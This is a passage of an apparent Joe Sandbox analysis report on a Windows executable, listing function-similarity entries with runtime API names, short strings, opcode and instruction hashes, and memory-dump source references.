                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfomemcpy_s
                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                        • API String ID: 1759834784-2761157908
                                                                                        • Opcode ID: c1568b5568d689d261f1f0b975b9c1104ab10acfc5286cd5346a40821ab4f9bc
                                                                                        • Instruction ID: 4033c06fb62767e2d555f85042e5686346aaa6bf307d7c148aa905871c3ac03d
                                                                                        • Opcode Fuzzy Hash: c1568b5568d689d261f1f0b975b9c1104ab10acfc5286cd5346a40821ab4f9bc
                                                                                        • Instruction Fuzzy Hash: ABB22872A085C28BE725AE24DC407FDB7A9FF4C398F906139DA0957B95DF38E5848B10
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: NamePath$File_invalid_parameter_noinfo_noreturn$LongMoveShort$CompareCreateString
                                                                                        • String ID: rtmp
                                                                                        • API String ID: 3587137053-870060881
                                                                                        • Opcode ID: 2d571345357ed831951e913cf5b34db2d9c750839b47aacb8777740eed476449
                                                                                        • Instruction ID: 3cda63535a06badd618b244c7614a4313682e2bac6cab6ce7921722c3754c2ef
                                                                                        • Opcode Fuzzy Hash: 2d571345357ed831951e913cf5b34db2d9c750839b47aacb8777740eed476449
                                                                                        • Instruction Fuzzy Hash: 2DF1D122B0AA8281EB10EB75DC801BDA761FF993D4FD02132EA4D47AA9DF3CD595C350
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 1693479884-0
                                                                                        • Opcode ID: b93ad2ce8aad967ae532d61f25a7d43417873e191935b00f4afba2dee12255a3
                                                                                        • Instruction ID: 81c92fb70bf4fb5a570b010939f43dc488e77fa492710fc75dba9872ab8d5eca
                                                                                        • Opcode Fuzzy Hash: b93ad2ce8aad967ae532d61f25a7d43417873e191935b00f4afba2dee12255a3
                                                                                        • Instruction Fuzzy Hash: 5FA1D362F15A6244FE01AB79DC441BCA361AF8DBE4B906235DE6D17BD9DF3CE0818320
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 3140674995-0
                                                                                        • Opcode ID: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
                                                                                        • Instruction ID: 9218853679e6384368455767ac7a6991fa1d53cb2dc483803e0abeb60dc451f5
                                                                                        • Opcode Fuzzy Hash: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
                                                                                        • Instruction Fuzzy Hash: C0316F72608B819AEB649F60EC503EDB364FF98754F845039DA8D47A88DF7CD589C720
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 1239891234-0
                                                                                        • Opcode ID: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
                                                                                        • Instruction ID: 6b88782661909a02325d40e06faaff7dc2d86ccb47e6992503f09d9832055f12
                                                                                        • Opcode Fuzzy Hash: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
                                                                                        • Instruction Fuzzy Hash: D0316132608B8195EB649F25EC403AEB3A4FF98754F941136EA8D43B99DF3CD545CB10
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 3668304517-0
                                                                                        • Opcode ID: fb96d10bca390bfec114724123450dd1eda7456c883d7babf62e98013e8dd4f7
                                                                                        • Instruction ID: aedf1b96bd3088bf3939968b179ea8bce196aa62c9384c4b55795d0f7353eec8
                                                                                        • Opcode Fuzzy Hash: fb96d10bca390bfec114724123450dd1eda7456c883d7babf62e98013e8dd4f7
                                                                                        • Instruction Fuzzy Hash: CEB1F422B5668686EB10AB65DD442EDA361FFAD794FC02231EA8C07BD9DF3CD541C320
                                                                                        APIs
                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FF70E7BFAC4
                                                                                          • Part of subcall function 00007FF70E7B7934: GetCurrentProcess.KERNEL32(00007FF70E7C0CCD), ref: 00007FF70E7B7961
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                        • String ID: *?$.
                                                                                        • API String ID: 2518042432-3972193922
                                                                                        • Opcode ID: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
                                                                                        • Instruction ID: defd1332cf1dc31d6aeb2e7ba8b7ae6e99114233d5fbbc01711142d145d8d525
                                                                                        • Opcode Fuzzy Hash: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
                                                                                        • Instruction Fuzzy Hash: 2451F462B14A9541EB14EFA6DC102B9A3A4FF6CFD8B845532DE9D17B85DF3CD0428310
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy_s
                                                                                        • String ID:
                                                                                        • API String ID: 1502251526-0
                                                                                        • Opcode ID: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                                                        • Instruction ID: c28a6da3e3d7707d1ac2d6030f3bc742bffb87cacbd33c978be79d81628758cc
                                                                                        • Opcode Fuzzy Hash: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                                                        • Instruction Fuzzy Hash: 98D1E132B18AC287DB34DF15E5846AAB7A5FB88794F449138CB4E53B55DB3CE881CB00
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFormatFreeLastLocalMessage
                                                                                        • String ID:
                                                                                        • API String ID: 1365068426-0
                                                                                        • Opcode ID: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
                                                                                        • Instruction ID: cda5caba7bedc316ec077dc22915a7678873b15edff792d886e15ec434916f87
                                                                                        • Opcode Fuzzy Hash: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
                                                                                        • Instruction Fuzzy Hash: CC012C7660874282E614AF22F95017AA395BF9DBD0F885035EA8D46B45CF3CE5448710
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: .
                                                                                        • API String ID: 0-248832578
                                                                                        • Opcode ID: 7c9d8364e7b62915daf92aecf888b4814fe01b6aae5fc02ec6e7aa2f3019df5b
                                                                                        • Instruction ID: 9dd30f8a9102f9e8798ebe5820f53d26d7ef3dfaad2b6a3827b122246d8b31a2
                                                                                        • Opcode Fuzzy Hash: 7c9d8364e7b62915daf92aecf888b4814fe01b6aae5fc02ec6e7aa2f3019df5b
                                                                                        • Instruction Fuzzy Hash: 93310822B1869145F764AA36DC057B9EA91AFA8FE4F849235EE9C47BC5CF3CD5018300
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionRaise_clrfp
                                                                                        • String ID:
                                                                                        • API String ID: 15204871-0
                                                                                        • Opcode ID: 131550a8e914c8a4384a7255cc8ec53066b4dff0b7ecc1394be8dfb6b4310eca
                                                                                        • Instruction ID: 9d07ef4faf7c13025fb02f18d42edad61524df5766ededd5ed649a8615ae7bf2
                                                                                        • Opcode Fuzzy Hash: 131550a8e914c8a4384a7255cc8ec53066b4dff0b7ecc1394be8dfb6b4310eca
                                                                                        • Instruction Fuzzy Hash: 52B1A073600B858BEB19CF29C88636C7BE0FB48B58F558925DB5D837A4CB3AE491C710
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ObjectRelease$CapsDevice
                                                                                        • String ID:
                                                                                        • API String ID: 1061551593-0
                                                                                        • Opcode ID: 68dbe16693602acb82a0a9c061fd0d735b77194d41f4ab9e90264308bb487059
                                                                                        • Instruction ID: 09cdb94683b0cf5dedb65220e9ec8f8a132ad145a34a5551ca5e676caec99f6b
                                                                                        • Opcode Fuzzy Hash: 68dbe16693602acb82a0a9c061fd0d735b77194d41f4ab9e90264308bb487059
                                                                                        • Instruction Fuzzy Hash: E7814832B08A1686FB24DF6AE8446ADB375FB88B98F446126DE0D57B24DF38E144C350
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: FormatInfoLocaleNumber
                                                                                        • String ID:
                                                                                        • API String ID: 2169056816-0
                                                                                        • Opcode ID: a0c8fcaef59427837b2a7c7753e3d717a8442860a15e47712294eddcbb527c28
                                                                                        • Instruction ID: 351d3ca29a0d58659ed215f3d8c7b93e1c17b11a27b974519959e0ca86f1f1b7
                                                                                        • Opcode Fuzzy Hash: a0c8fcaef59427837b2a7c7753e3d717a8442860a15e47712294eddcbb527c28
                                                                                        • Instruction Fuzzy Hash: 31114722A08B8195E661AF21E8003EAB364FF8CB88FC46135DA8D03768DF3CE145C754
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF70E7924C0: CreateFileW.KERNELBASE ref: 00007FF70E79259B
                                                                                          • Part of subcall function 00007FF70E7924C0: GetLastError.KERNEL32 ref: 00007FF70E7925AE
                                                                                          • Part of subcall function 00007FF70E7924C0: CreateFileW.KERNEL32 ref: 00007FF70E79260E
                                                                                          • Part of subcall function 00007FF70E7924C0: GetLastError.KERNEL32 ref: 00007FF70E792617
                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7915D0
                                                                                          • Part of subcall function 00007FF70E793980: MoveFileW.KERNEL32 ref: 00007FF70E7939BD
                                                                                          • Part of subcall function 00007FF70E793980: MoveFileW.KERNEL32 ref: 00007FF70E793A34
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$CreateErrorLastMove$_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 34527147-0
                                                                                        • Opcode ID: b6c9c40237190830a1427cc90f699f3ed679a8c4b0b9819d305839f030af1316
                                                                                        • Instruction ID: 5cb0e37e39ccbe3caf8e91af96a70c1ca27721edd63e4f7c58560be6478044ac
                                                                                        • Opcode Fuzzy Hash: b6c9c40237190830a1427cc90f699f3ed679a8c4b0b9819d305839f030af1316
                                                                                        • Instruction Fuzzy Hash: 7B91D222B19A4292EB10EB72E8442AEA361FF58BC4FC16032EE4D57BA5DF3CD555C310
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Version
                                                                                        • String ID:
                                                                                        • API String ID: 1889659487-0
                                                                                        • Opcode ID: 5e1f820920c456f15e44ae9d5f0cc3b6f822566f542002a6e47536c5256bfc9c
                                                                                        • Instruction ID: abcaf48b0e62d1305672867fffeb1873f5249177a6a8b238bfe393fa9414adcf
                                                                                        • Opcode Fuzzy Hash: 5e1f820920c456f15e44ae9d5f0cc3b6f822566f542002a6e47536c5256bfc9c
                                                                                        • Instruction Fuzzy Hash: DA01847194D58389FA31AB30EC543B5F3A25FAD30AFC82134C5AC07291DF3CA0498A34
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID: 0
                                                                                        • API String ID: 3215553584-4108050209
                                                                                        • Opcode ID: 0fbd957179d89af9e1d3453d65279f22830f04fe064c784c04e338e6c7bf3646
                                                                                        • Instruction ID: 80540c1e892667337603e0425be69e30a4d22f9d46107498001799760f410d7b
                                                                                        • Opcode Fuzzy Hash: 0fbd957179d89af9e1d3453d65279f22830f04fe064c784c04e338e6c7bf3646
                                                                                        • Instruction Fuzzy Hash: EE811521A2824342FAACAA15C84077DA398EF7C744FD83532DD898B695CF3DE805C362
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID: 0
                                                                                        • API String ID: 3215553584-4108050209
                                                                                        • Opcode ID: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
                                                                                        • Instruction ID: d6e62448ed69cbd6319909161b1ee7c517394ef804a5aa610f5d4046dc45fc9d
                                                                                        • Opcode Fuzzy Hash: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
                                                                                        • Instruction Fuzzy Hash: 9C711621A0C28246FB6CEA24C84037EE7989F69744F943535DDC99B7C6CF2DE8468762
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
